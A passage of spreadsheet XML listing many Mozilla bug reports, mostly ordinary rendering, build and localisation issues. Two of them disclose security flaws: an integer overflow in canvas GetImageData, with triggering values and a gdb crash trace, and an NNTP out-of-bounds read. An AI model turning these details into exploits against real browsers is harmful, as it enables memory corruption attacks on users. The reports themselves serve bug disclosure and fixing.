3)  Search for mailing list password or list password -- no luck.
We should have the relevant page linked to from _somewhere_ doing it from the
general mailing lists page I found at step 2 would be nice.</t>
  </si>
  <si>
    <t>CORE-156731</t>
  </si>
  <si>
    <t>Displayed image truncated correct after reload</t>
  </si>
  <si>
    <t>Go to the URL given above.  There is an image of a light bulb
to the right of the page.  When the page first loads the 
image is truncated on the right (see attachment ssage1.gif).
Press reload and the image is displayed correctly (ssage2.gif).
Browser build id 2002053012</t>
  </si>
  <si>
    <t>CORE-392431</t>
  </si>
  <si>
    <t>Using large images as background for the 'body' don't render in Cairo</t>
  </si>
  <si>
    <t>Created attachment 276926
Test file
See attached testcase. 
Expected: page with wooden background and a small white box horizontally centered on page.
Result: Black page with the small white box.
Repainting sometimes draws part of the background image.
Right-click and selecting View Background Image shows the full image so Firefox is able to load and display it.
Making the background image smaller will get better results but it is unclear how much smaller. There seems to be no hard limits.
Note this is not the same as bug 282600 which is just about performance issues and is way before the Cairo implementation.</t>
  </si>
  <si>
    <t>alfredkayser</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-436015</t>
  </si>
  <si>
    <t>Please update Despot to pick up new template for owners.html</t>
  </si>
  <si>
    <t>I updated the text in the template for www.mozilla.org/owners.html
Reed checked it in says despot needs to be updated -- see below (comment 14 from bug 432297)
Reed Loden [:reed]   2008-05-27 19:10:25 PDT
Checking in owners.templ
/cvsroot/mozilla/webtools/despot/owners.templv  &lt;--  owners.templ
new revision: 1.9 previous revision: 1.8
done
Please file an IT request to get Despot updated.</t>
  </si>
  <si>
    <t>mitchell</t>
  </si>
  <si>
    <t>CORE-303023</t>
  </si>
  <si>
    <t>SVG content in an EMBED element doesn't print</t>
  </si>
  <si>
    <t>Printing should treat an EMBEDded SVG document like an IFRAME or OBJECT but it
doesn't --- probably because SVG is the only content type that creates a
subdocument via EMBED and printing was written before SVG. Currently printing a
document containing an SVG EMBED fails to print anything in the subdocument for
me and horks print preview.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-828337</t>
  </si>
  <si>
    <t>Preinstalled B2G Apps</t>
  </si>
  <si>
    <t>Maps app is not re-localized when device locale is changed</t>
  </si>
  <si>
    <t>Created attachment 699811
screenshot
1. set device to PT-BR
2. launch maps
Expected: app should be localized
Actual: app is not localized for the agreement the about page the countries
Note: 
This bug is more for tracking purposes on an app that isn't ours.
Question: do we need to add support for 3rd party apps to be localized as well?</t>
  </si>
  <si>
    <t>nhirata.bugzilla</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-206070</t>
  </si>
  <si>
    <t>chip.de - JavaScript Console shows 'Error: phpads_49 has no properties'</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6
On this page if you click on a certain link a popup window shows up and also
the javascript console. Neither of them should.
Reproducible: Always
Steps to Reproduce:
1. Browse to http://www.chip.de/downloads/c_downloads_8878492.html
2. Click on Diesen Download jetzt bewerten (=rate this download now) below the
green and red thumbs.
Actual Results:  
1. Javascript console shows up having no entry in it.
2. The popup window shows up.
Expected Results:  
Neither the javascript console nor the popup window should be displayed.
Don't forget to vote for Firebird 0.6 by clicking on the green thumb in the
popup window!</t>
  </si>
  <si>
    <t>CORE-71760</t>
  </si>
  <si>
    <t>Move JS spacebar handler code into C++</t>
  </si>
  <si>
    <t>When embedding mozilla I get warnings when pressing the spacebar:
JavaScript error:
 line 1: document.commandDispatcher has no properties 
This is from the htmlBindings.xul fil in the keypress handler for the spacebar key.
Info from kin:
A quick look in lxr leads me to believe that your little code snippet assumes
that 'document' is a XUL Document. You guys aren't using XUL in the embedding
world right?
It looks like an nsXULCommandDispatcher is automatically created in the Init()
method of all nsXULDocuments which I believe is what you get when you do a
document.commandDispatcher ...  and nsXULCommandDispatcher defines methods for
getting/setting the focused element (document.commandDispatcher.focusedElement)
which is really a forwarding mechanism to the focus controller that it gets from
the nsPIDOMWindow interface.
Dave says that he can fix this.  Assigning to him.</t>
  </si>
  <si>
    <t>arik</t>
  </si>
  <si>
    <t>CORE-351296</t>
  </si>
  <si>
    <t>int overflow in nsCanvasRenderingContext2D::GetImageData</t>
  </si>
  <si>
    <t>int overflow in nsCanvasRenderingContext2D::GetImageData
there is int overflow in nsCanvasRenderingContext2D::GetImageData
---------
  if (w &lt;= 0 || h &lt;= 0 ||
        x + w &gt; mWidth || y + h &gt; mHeight)
        return NS_ERROR_DOM_SYNTAX_ERR
---------
with luser controlled whxy the above checks are close to useless.
later:
   allocatedSurfaceData = new PRUint8[w * h * 4]
....
   nsAutoArrayPtr jsvector(new jsval[w * h * 4])
gdb session:
Breakpoint 1 nsCanvasRenderingContext2D::GetImageData (this=0x8dab428)
    at /opt/joro/firefox/mozilla/content/canvas/src/nsCanvasRenderingContext2D.cpp:2846
2846            allocatedSurfaceData = new PRUint8[w * h * 4]
(gdb) p w
$1 = 536870915
(gdb) p h
$2 = 536870915
(gdb) p w*h*4
$3 = 36
(gdb) p x
$4 = -536870914
(gdb) p y
$5 = -536870914
(gdb) cont
Continuing.
[Thread -1303647312 (LWP 15247) exited]
Program received signal SIGSEGV Segmentation fault.
0xb7edb833 in pixman_fill_rect_32bpp (dst=0x8da8c78 xDst=0 yDst=0 width=3 
    height=1 pixel=0xbfa6a154)
    at /opt/joro/firefox/mozilla/gfx/cairo/libpixman/src/icrect.c:143
143                 *(uint32_t *)data = int_pixel
Current language:  auto currently c
(gdb) x/4x data
0x88da8c34:     Cannot access memory at address 0x88da8c34</t>
  </si>
  <si>
    <t>FIREFOX-460124</t>
  </si>
  <si>
    <t>remove workaround for principal hashtable inconsistency</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
With bug #454850 fixed and pushed this workaround (in nsScriptSecurityManager.cpp) becomes unnecessary:
mPrincipals.Get(principal getter_AddRefs(fromTable))
if (!fromTable)
{
    //-- Check to see if we have a more general principal
    // XXXbz if only GetOrigin returned a URI!  Or better yet if the
    // HashKey function on principals were smarter.  As it is we can
    // have cases where two principals will have different hashkeys but
    // test equal via KeyEquals which is absolutely silly.  That's
    // what we're working around here.
    nsXPIDLCString originUrl
    rv = principal-&gt;GetOrigin(getter_Copies(originUrl))
    if (NS_FAILED(rv)) return rv
    nsCOMPtr newURI
    rv = NS_NewURI(getter_AddRefs(newURI) originUrl nsnull sIOService)
    if (NS_FAILED(rv)) return rv
    nsCOMPtr principal2
    rv = CreateCodebasePrincipal(newURI getter_AddRefs(principal2))
    if (NS_FAILED(rv)) return rv
    mPrincipals.Get(principal2 getter_AddRefs(fromTable))
}
That is the first result from mPrincipals.Get can now be trusted.
Reproducible: Didn't try</t>
  </si>
  <si>
    <t>mozilla+ben</t>
  </si>
  <si>
    <t>NSPR-71179</t>
  </si>
  <si>
    <t>QNX photon port requires changes to the prlink.c to run 4x netscape plugins</t>
  </si>
  <si>
    <t>patch is attached to message in url. please help get this (or a derivative) 
checked in.</t>
  </si>
  <si>
    <t>CORE-300663</t>
  </si>
  <si>
    <t>background doesn't repaint on back with iframe in certain situations with bfcache</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b3) Gecko/20050713 Firefox/1.0+
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b3) Gecko/20050713 Firefox/1.0+
With the supplied simple test case URL the combination of an iframe with a page
which links to another page that contains a javascript focus() on window.onload
causes background repaint issues on back (when bfcache is enabled).  See the URL
for more details.
Reproducible: Always
Steps to Reproduce:
1. Visit test case URL
2. Click on link inside iframe
3. Press back
Actual Results:  
The background of the initial iframe page is incorrect (black in windows static
garbage in linux).
Expected Results:  
The background should be normal (white).</t>
  </si>
  <si>
    <t>brewt-bugzilla.mozilla.org</t>
  </si>
  <si>
    <t>CORE-479022</t>
  </si>
  <si>
    <t>fast path nsCanvasRenderingContext2D::PutImageData() is wrong on BIG_ENDIAN machine</t>
  </si>
  <si>
    <t>it should be ARGB not RGBA.</t>
  </si>
  <si>
    <t>CORE-402937</t>
  </si>
  <si>
    <t>[FIX]nsObjectFrame::Instantiate can reenter itself</t>
  </si>
  <si>
    <t>Relevant stack is attachment 287509.  The highlight is:
#2  0x17bd9943 in nsObjectFrame::Instantiate (this=0x25638b0 aMimeType=0x3ed242b8 application/x-shockwave-flash aURI=0x3ed0d7e0) at /Users/jruderman/trunk/mozilla/layout/generic/nsObjectFrame.cpp:1433
#3  0x17d93c8b in nsObjectLoadingContent::Instantiate (this=0x3ed241fc aFrame=0x25638dc aMIMEType=@0x3ed24238 aURI=0x3ed0d7e0) at /Users/jruderman/trunk/mozilla/content/base/src/nsObjectLoadingContent.cpp:1548
#4  0x17d945d6 in nsObjectLoadingContent::EnsureInstantiation (this=0x3ed241fc aInstance=0xbfffcb14) at /Users/jruderman/trunk/mozilla/content/base/src/nsObjectLoadingContent.cpp:703
#5  0x17f6cf4d in nsHTMLPluginObjElementSH::GetPluginInstance (this=0x3e749230 wrapper=0x3ed00c80 _result=0xbfffcb14) at /Users/jruderman/trunk/mozilla/dom/src/base/nsDOMClassInfo.cpp:8623
#6  0x17f757b5 in nsHTMLPluginObjElementSH::PostCreate (this=0x3e749230 wrapper=0x3ed00c80 cx=0x2fab73c0 obj=0x3ddf6be0) at /Users/jruderman/trunk/mozilla/dom/src/base/nsDOMClassInfo.cpp:8663
....
Calling JS-implemented content policy so JS-wrap the node
....
#17 0x3df4228d in NS_CheckContentLoadPolicy (contentType=5 contentLocation=0x3ed0d7e0 originPrincipal=0x3ed0d380 context=0x3ed24250 mimeType=@0xbfffd88c extra=0x0 decision=0xbfffd856 policyService=0x0 aSecMan=0x0) at ../../../../dist/include/content/nsContentPolicyUtils.h:223
#18 0x3df1fe47 in nsPluginHostImpl::InstantiateEmbeddedPlugin (this=0x3de006c0 aMimeType=0x3ed242b8 application/x-shockwave-flash aURL=0x3ed0d7e0 aOwner=0x3ed25d20) at /Users/jruderman/trunk/mozilla/modules/plugin/base/src/nsPluginHostImpl.cpp:3492
#19 0x17bd5163 in nsObjectFrame::InstantiatePlugin (this=0x25638b0 aPluginHost=0x3de006c4 aMimeType=0x3ed242b8 application/x-shockwave-flash aURI=0x3ed0d7e0) at /Users/jruderman/trunk/mozilla/layout/generic/nsObjectFrame.cpp:793
#20 0x17bd9a77 in nsObjectFrame::Instantiate (this=0x25638b0 aMimeType=0x3ed242b8 application/x-shockwave-flash aURI=0x3ed0d7e0) at /Users/jruderman/trunk/mozilla/layout/generic/nsObjectFrame.cpp:1445
I think we need to guard against this...  Christian do you think you can give this a stab?</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-309444</t>
  </si>
  <si>
    <t>nsNNTPProtocol::ListXActiveResponse cast error leading to memory disclosure</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050907 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050907 Firefox/1.0.6
A typo is broking the ListXActiveResponse feature while potentially creating a
minor security bug :
4589       if (s)
4590       {
4591         char flags[32] /* ought to be big enough */
4592         *s = 0
4593         PR_sscanf(s + 1
4594           %d %d %31s 
4595           &amp;m_firstPossibleArticle 
4596           &amp;m_lastPossibleArticle
4597           flags)
At line 4589 the condition is obviously erroned (and will always be true) and
should be
- if (s)
+ if (*s)
The write-in-memory at line 4592 is safe (in worst scenario it's overwriting the
terminating null byte by a new null byte) but the sscanf at line 4593 isn't : s
+ 1 could be out of bound of the buffer potentially disclosing a part of the
heap - if it does match the required format -.
I believe this bug is very minor and the security impact nearly null I set the
'sensitive' flag by precaution feel free to remove it at any time if you think
it's the right things to do.
Reproducible: Always
Steps to Reproduce:
I didn't try to reproduce/trigger it. I imagine it's easily doable by returning
invalid input (full of ' ' or '\t' to match the NET_IF_SPACE line 4587).</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-279012</t>
  </si>
  <si>
    <t>no support for @incremental in input et. al.</t>
  </si>
  <si>
    <t>We currently have no support for the incremental attribute for our input secret
and textarea controls.
Which isn't a massively huge deal since neither does Novell or XSmiles as far as
I can tell.  But formsPlayer does and we will need to eventually.
I will post a testcase.</t>
  </si>
  <si>
    <t>TOOLKIT-289914</t>
  </si>
  <si>
    <t>Ignore #comment lines in chrome manifests</t>
  </si>
  <si>
    <t>Like I meant to originally.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-522712</t>
  </si>
  <si>
    <t>Port |Bug 511761 - Only use compatibility.ini (not .autoreg or stat()s) to invalidate fastloads and other caches| to comm-central (apps)</t>
  </si>
  <si>
    <t>CORE-508180</t>
  </si>
  <si>
    <t>Consolidate four nsXULWindow::Load*FormXUL methods</t>
  </si>
  <si>
    <t>Created attachment 392412
v1
This patch is on top of the one in bug 269410. I'm also making the hidechrome attribute case-sensitive.</t>
  </si>
  <si>
    <t>NSPR-66325</t>
  </si>
  <si>
    <t>PR_LoadLibrary picks up same named file on SHLIB_PATH even if a pathname is specified.</t>
  </si>
  <si>
    <t>This bug only affects HP-UX.  On HP-UX PR_LoadLibrary calls
shl_load() with the DYNAMIC_PATH flag.  If an application is
linked with the +s linker option the DYNAMIC_PATH flag of
shl_load() causes it to search for the shared library in some
search path such as that specified by the SHLIB_PATH environment
variable.  However the way shl_load(DYNAMIC_PATH) uses the
search path is very aggressive.  For example if you have a
libfoo.sl on your SHLIB_PATH all of the shl_load() calls below
will succeed (assuming none of the specified pathnames refer to
an existing file):
    shl_load(libfoo.sl DYNAMIC_PATH|BIND_DEFERRED 0)
    shl_load(./libfoo.sl DYNAMIC_PATH|BIND_DEFERRED 0)
    shl_load(../../lib/libfoo.sl DYNAMIC_PATH|BIND_DEFERRED 0)
    shl_load(/no/such/dir/libfoo.sl DYNAMIC_PATH|BIND_DEFERRED 0)
    shl_load(no/such/dir/libfoo.sl DYNAMIC_PATH|BIND_DEFERRED 0)
One would expect that only the first call should succeed i.e.
the dynamic library search path should be used only when a
plain file name containing no directory is specified.  Indeed
this is the behavior of dlopen().
We should modify PR_LoadLibrary() to pass DYNAMIC_PATH
to shl_load() only if the specified name is a plain file name
containing no directory so that PR_LoadLibrary has the same
behavior across all platforms.</t>
  </si>
  <si>
    <t>BUGZILLA-523999</t>
  </si>
  <si>
    <t>New Hook: template-before_create</t>
  </si>
  <si>
    <t>Created attachment 407906
v1
This hook allows developers to change the configuration of the Bugzilla::Template object in a hook.</t>
  </si>
  <si>
    <t>THUNDERBIRD-474701</t>
  </si>
  <si>
    <t>gloda global search on toolbar folder display refactoring mega-bug</t>
  </si>
  <si>
    <t>Falling out of bug 452281.  This will add a new search entry in the the default mail toolbar intended to provide a better search experience than the existing quick search.
The existing quick search could just be reused however it will be easier to add new search entry code specific to the behaviour we want.  Also this will leave the old quick search entry untouched such that people could bring it back.
---
With the removal of several buttons from the default mail toolbar ( bug 474523 ) the new search entry should take up a larger amount of horizontal space.  Likely twice the size of the current quick search entry.  It's placement can be the same as the quick search entry.  The emptytext should describe what the search entry is for.
On the right hand side we should be showing a search icon similar to what firefox uses for it's search input entry.
$emptytext = Search messages ( + keyboard_ accelerator + )
  [ $emptytext                                # ]
When a person enters some search text the search icon should change to be a |&gt; go arrow button that is clickable to start the search this button can be triggered from pressing enter as well.
  [ bugzilla                                 |&gt; ]
In the same space as the go button we should provide a clear button that removes the search terms from the search entry after the search has been performed.
  [ bugzilla                                (x) ]
When a search is started from the main mail tab it will always open a new tab.  This the search entry should always be empty from the main tab.  When in a search results tab changing the search input and searching again does not open the results in a new tab.  (we may want to add in a ctrl-enter command that does this)  If the tab is changed from one search result to another the search entry contents should change to match the tab search parameters.</t>
  </si>
  <si>
    <t>NSS-78528</t>
  </si>
  <si>
    <t>secasn1.h causes unresolved symbols on win32 C++ programs</t>
  </si>
  <si>
    <t>The header secasn1.h doesn't put the const ASN1 templates inside of an extern
C block so when linking a program on win32 that uses one of the templates
the symbol mangling causes an unresolved symbol.
Patch coming shortly.</t>
  </si>
  <si>
    <t>CORE-212626</t>
  </si>
  <si>
    <t>iframe shortens shift+tab cycle</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Load the testcase.
2. Shift+tab a bunch.  (Holding down both works.)
Result: only the link right after the iframe and the iframe itself get focus.
This happens on any page containing an iframe.
The strange thing is that shift+tabbing from the iframe itself seems to depend
on where you came from.  If you tab into the iframe and shift+tab immediately
shift+tab does the correct thing.  But if you got into the iframe by
shift+tabbing shift+tabbing out of the iframe goes to the wrong place.</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-480038</t>
  </si>
  <si>
    <t>less setViewportSize</t>
  </si>
  <si>
    <t>Created attachment 363973
nuke 1 line saves 150ms of startup
it gets called twice since zoomtopage called on/during pageload updates page dimensions</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-157606</t>
  </si>
  <si>
    <t>Enthusian timesheets cannot be submitted using NS 7.0 / latest Mozilla build</t>
  </si>
  <si>
    <t>Enthusian doesn't appear to be fully supporting latest Mozilla builds and NS 7.0
specifically.
Although they allow their page to be navigated and time sheets filled out the
form cannot be submitted. Even worse it's not clear at all that the form hasn't
been accepted on the server side.
Enthusian has to either change their website to indicated that newer (unstable)
versions of Mozilla-based browsers are not supported or allow all Mozilla-based
browser greater than version X.x (where X and x has to be determined by their
internal requirements).</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-215203</t>
  </si>
  <si>
    <t>move source code CVS from thelizard to megalon</t>
  </si>
  <si>
    <t>The source code CVS repository needs to be moved to megalon as part of the process
of transitioning mozilla.org to the Mozilla Foundation.  Preliminary work can be
done now but megalon needs to land in its new colo space before the final switch
is flipped.  Per Steve's latest status report on this work:
CVS has been set up on megalon chroot jailed passwords copied over rsynced
every 30 minutes it's ready to go.</t>
  </si>
  <si>
    <t>scbrown</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-385937</t>
  </si>
  <si>
    <t>Remove nsIBlender</t>
  </si>
  <si>
    <t>My tree doesn't have any places outside of the implementation that include nsIBlender.  We can easily remove it.  (I need to check-in my view patches first before I can make this diff easily there isn't anything non-trivial blocking it though.)</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-507018</t>
  </si>
  <si>
    <t>und missing in toolkit\chrome\mozapps\update\updates.properties</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9.1) Gecko/20090624 Firefox/3.5
Build Identifier: 
Strings for incompatibleAddons_major and incompatibleAddons_minor in toolkit\chrome\mozapps\update\updates.properties:
[...] wird %S diese Add-ons aktualisieren wieder aktivieren:
should be
[...] wird %S diese Add-ons aktualisieren und wieder aktivieren:
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-513006</t>
  </si>
  <si>
    <t>Some scrollbars disappear if GTK2 theme has scrollbar buttons turned off</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.1.2) Gecko/20090730 SUSE/3.5.2-1.1 Firefox/3.5.2
Build Identifier: Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.1.2) Gecko/20090730 SUSE/3.5.2-1.1 Firefox/3.5.2
Using any GTK2 theme which does not display scrollbar buttons some scrollbars in Firefox are not displayed.
Reproducible: Always
Steps to Reproduce:
insert the following lines into gtkrc:
GtkScrollbar::has-backward-stepper=0
GtkScrollbar::has-forward-stepper=0
GtkScrollbar::has-secondary-backward-stepper=0
GtkScrollbar::has-secondary-forward-stepper=0
1) Load a website which does not require a horizontal scrollbar or any large picture.
2) Resize the browser window or zoom into the picture.
Actual Results:  
No horizontal scrollbar appears.
Expected Results:  
A horizontal scrollbar should appear.
Also there is never a vertical scrollbar in the Tools -&gt; Add-ons window.
Scrolling with keyboard or mouse wheel works nevertheless.</t>
  </si>
  <si>
    <t>t.zell</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-344205</t>
  </si>
  <si>
    <t>Does not handle NO response to IMAP IDLE command from server that supports IDLE (Tb issues DONE even though NO to IDLE)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en) AppleWebKit/418.8 (KHTML like Gecko) Safari/419.3
Build Identifier: version 3 alpha 1 (20060706)
2 OK [CAPABILITY UIDPLUS LITERAL+ UNSELECT NAMESPACE SORT MULTIAPPEND THREAD=ORDEREDSUBJECT THREAD=REFERENCES X-DRAFT-I01-ESEARCH LIST-EXTENDED IDLE URLAUTH CATENATE CONDSTORE STARTTLS] AUTHENTICATE Completed
3 namespace
* NAMESPACE (( /)) NIL ((Shared Folders/ /))
3 OK NAMESPACE Completed
4 lsub  *
* LSUB () / Trash
4 OK LSUB Completed
5 lsub  Shared Folders/*
5 OK LSUB Completed
6 list  INBOX
* LIST (\Noinferiors) / INBOX
6 OK LIST Completed
7 select INBOX
* FLAGS (\answered \flagged \deleted \draft \seen)
* OK [PERMANENTFLAGS (\answered \flagged \deleted \draft \seen \*)]  
* 15 EXISTS
* 0 RECENT
* OK [UNSEEN 4]  
* OK [UIDVALIDITY 1152410760]  
* OK [UIDNEXT 18]  
* OK [URLMECH INTERNAL]
* OK [HIGHESTMODSEQ 305]  
7 OK [READ-WRITE] SELECT Completed
8 UID fetch 1:* (FLAGS)
* 1 FETCH (FLAGS (\seen) UID 1)
* 2 FETCH (FLAGS (\seen) UID 2)
* 3 FETCH (FLAGS (\seen) UID 3)
* 4 FETCH (FLAGS () UID 4)
* 5 FETCH (FLAGS (\seen) UID 5)
* 6 FETCH (FLAGS () UID 7)
* 7 FETCH (FLAGS () UID 8)
* 8 FETCH (FLAGS (\seen) UID 9)
* 9 FETCH (FLAGS (\seen) UID 11)
* 10 FETCH (FLAGS (\seen) UID 12)
* 11 FETCH (FLAGS (\seen) UID 13)
* 12 FETCH (FLAGS (\seen) UID 14)
* 13 FETCH (FLAGS () UID 15)
* 14 FETCH (FLAGS (\seen) UID 16)
* 15 FETCH (FLAGS (\seen) UID 17)
8 OK UID FETCH Completed
9 IDLE
9 NO IDLE Internal Error
DONE
DONE BAD Null command
10 authenticate CRAM-MD5
10 BAD session in wrong state for the command
11 authenticate CRAM-MD5
11 BAD session in wrong state for the command
12 logout
* BYE LOGOUT received
12 OK LOGOUT Completed
Reproducible: Always
Steps to Reproduce:
1. Have the IMAP server return NO to IDLE command
2. select a message or change a flag.
3. Client now thinks it's not authenticated which it is.
4. Need to logout
Actual Results:  
Need to logout
Expected Results:  
Don't use IDLE for that session.</t>
  </si>
  <si>
    <t>gds</t>
  </si>
  <si>
    <t>cjek420</t>
  </si>
  <si>
    <t>CORE-248065</t>
  </si>
  <si>
    <t>Teardown on script error kills all script threads</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040413 Debian/1.6-5
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040413 Debian/1.6-5
This bug exists in mozilla-1.6 and probably all later at least 1.7.
--- Scenario ---
Before body.onload a script can use document.writeln() to insert stuff. The
interesting part is what happens if it inserts another script fx:
// document.writeln() generates the inserted script
document.writeln(alert('executing inserted script'))
alert('done inserting')
Eventually the user will see both dialogs. The interesting part is that it might
happen in any order (this is not the bug):
1) Deferred execution: In some cases the inserted script is deferred. The
inserting script executes to completion then the inserted script is executed.
2) Immediate execution: In other cases the inserted script is executed
*immediately*. The inserting script is really interrupted and a new thread is
started executing the inserted script.
In Mozilla's case it has the rule has traditionally been:
- If the inserted script is inline (as above) it is executed immediately.
- If the inserted script is external () it is
executed deferred.
I have tested the behaviour in all browsers since I rely on it and they all
behave differently.
--- The bug ---
The important property that I rely on is:
- When inserted script is executed immediately
- and it fails with a script error
- the inserting script will continue from where it was interrupted as if the
inserted script had exited normally.
It has always been that way in all browsers. Now except mozilla-1.6 and 1.7
(tested under Debian Linux and Windows XP SP1).
In mozilla-1.6+ when an inserted script is executed immediately and it fails
it also takes down the main thread the inserting script. The inserting script
is simply never re-entered.
It seems that the error handler is to greedy when cleaning up. It takes down the
stack of the inserted script which it should but apparently it also takes down
the stack of the inserting script which it should not.
Reproducible: Always
Steps to Reproduce:
&lt;!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.01//EN
http://www.w3.org/TR/html4/strict.dtd&gt;
Teardown on script error is too greedy
var s = +no_such_function()+
document.writeln(s)
alert(main thread continuing)
Actual Results:  
JavaScript Console reports that no_such_function does not exist correct. Then
nothing happens.
Note that if you instead insert a  (an external
script that contains a script error) the dialog is shown.
Expected Results:  
After the inserted script has failed the main thread should continue showing
the alert().
Mozilla-1.5 and earlier does the expected as does every other browser I
currently test on: Netscape-4.8/Linux Opera-7.51/Linux Konqueror-3.2.2/Linux
Internet Explorer 4 5 5.5 and 6 on various Windows platforms.
There was a bug before 1.6: If an inserted script was executed immediately and
it had a script error it would not be reported to the JavaScript Console. This
is fixed in 1.6. I suspect the fix may have introduced the new brokenness.</t>
  </si>
  <si>
    <t>simonl</t>
  </si>
  <si>
    <t>CORE-421435</t>
  </si>
  <si>
    <t>Tune sizes of arenas using jsarenas</t>
  </si>
  <si>
    <t>As mentioned in comment #4 of bug 420476 typical uses of Firefox would do better with arenas larger than they are currently.  This bug is to monitor and track attempts to tune the CALLERS of jsarena code so that better arena sizes are chosen.</t>
  </si>
  <si>
    <t>CORE-306966</t>
  </si>
  <si>
    <t>Convert method comments in nsISecretDecoderRing to doxygen</t>
  </si>
  <si>
    <t>XULPlanet uses doxygen to generate reference documentation as will/does Devmo.
 Comments should start with /** in order to make them parsable.</t>
  </si>
  <si>
    <t>NSS-403240</t>
  </si>
  <si>
    <t>threads hanging in nss_InitLock</t>
  </si>
  <si>
    <t>Bug 399304 comment 1 and Bug 399304 comment 2 both report hangs in which 
many threads are stuck inside of nss_InitLock.  Bug 399304 proposes to 
work around this problem by not using nss_InitLock for that particular
lock and doing early initialization on that lock.  nss_InitLock 
continues to be used for other locks that are initialized on first use.
But the truth is that there is a problem with nss_InitLock.  It is 
evidently unreliable and we should either fix it or stop using it 
altogether.  I think we need to understand WHY it fails before we make
any decision.  If we then decide that the problem is intractable then
it would be valid to decide to abandon it.  But we should not abandon 
it simply because we do not understand how and why it fails.</t>
  </si>
  <si>
    <t>NSPR-184517</t>
  </si>
  <si>
    <t>support Solaris Packaging in NSPR 4.1.3</t>
  </si>
  <si>
    <t>We need support for Solaris Packaging in NSPR 4.1.3.
The differences between 
NSPRPUB_RELEASE_4_1_2_SUN_PKG_BRANCH and
NSPRPUB_RELEASE_4_1_2 need to checked into
NSPRPUB_RELEASE_4_1_BRANCH.
See http://bugzilla.mozilla.org/show_bug.cgi?id=158704</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-342221</t>
  </si>
  <si>
    <t>Microsummary picker has too much padding and doesn't block the popup when no microsummaries are available</t>
  </si>
  <si>
    <t>Not sure whether the padding issue is due to Winstripe in particular or to XUL themeing in general. As for the popup issue it might be worth considering replacing the menupicker with a textbox when no summaries are available.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-920626</t>
  </si>
  <si>
    <t>RelOps: Puppet</t>
  </si>
  <si>
    <t>deploy collectd to releng POSIX test systems</t>
  </si>
  <si>
    <t>We have already deployed collectd statistics gathering software to the linux and OS X build machines and most linux servers. We need to deploy the same software to the test machines.
These systems include:
tst-linux64*
tst-linux32*
talos-linux64*
talos-linux32*
talos-r4-snow*
talos-r4-lion*
talos-mtnlion-r5*</t>
  </si>
  <si>
    <t>jwatkins</t>
  </si>
  <si>
    <t>BUGZILLA-237769</t>
  </si>
  <si>
    <t>CPAN instructions in checksetup.pl not working under Windows</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 Q312461 .NET CLR 1.0.3705 .NET CLR 1.1.4322)
Build Identifier: 
if the Chart::Base modules is not installed Checksetup.pl ask to use the 
folowing command to install the module:
perl -MCPAN -e'install N/NI/NINJAZ/Chart-0.99b.tar.gz'
under windows the result of this command is n error:
Can't find string terminator ' anywhere before EOF at -e line 1.
the corect command under windows is
perl -MCPAN -einstall 'N/NI/NINJAZ/Chart-0.99b.tar.gz'
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>SEAMONKEY-498596</t>
  </si>
  <si>
    <t>Switch SeaMonkey bookmarks to places backend</t>
  </si>
  <si>
    <t>We should switch the SeaMonkey bookmarks UI to using places import all bookmarks from the old backend into places and then kill off the old backend.
This will enable the options (nobody is forced to use those) to have tags for bookmarks feed-driven live bookmarks and keyword tag and bookmarks search results from the location bar if people want those.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-442375</t>
  </si>
  <si>
    <t>Remove old Mozilla1.8.0 trees</t>
  </si>
  <si>
    <t>The server that hosts bonsai and tinderbox only has about 10% of disk space left so I was looking at what could be removed. 44 tinderbox trees from the 1.8.0 branch still exist and comprise about 576MB of space that could be reclaimed.
Here are the trees that will be removed:
Mozilla1.8.0
Mozilla1.8.0-l10n
Mozilla1.8.0-l10n-ar
Mozilla1.8.0-l10n-bg
Mozilla1.8.0-l10n-ca
Mozilla1.8.0-l10n-cs
Mozilla1.8.0-l10n-da
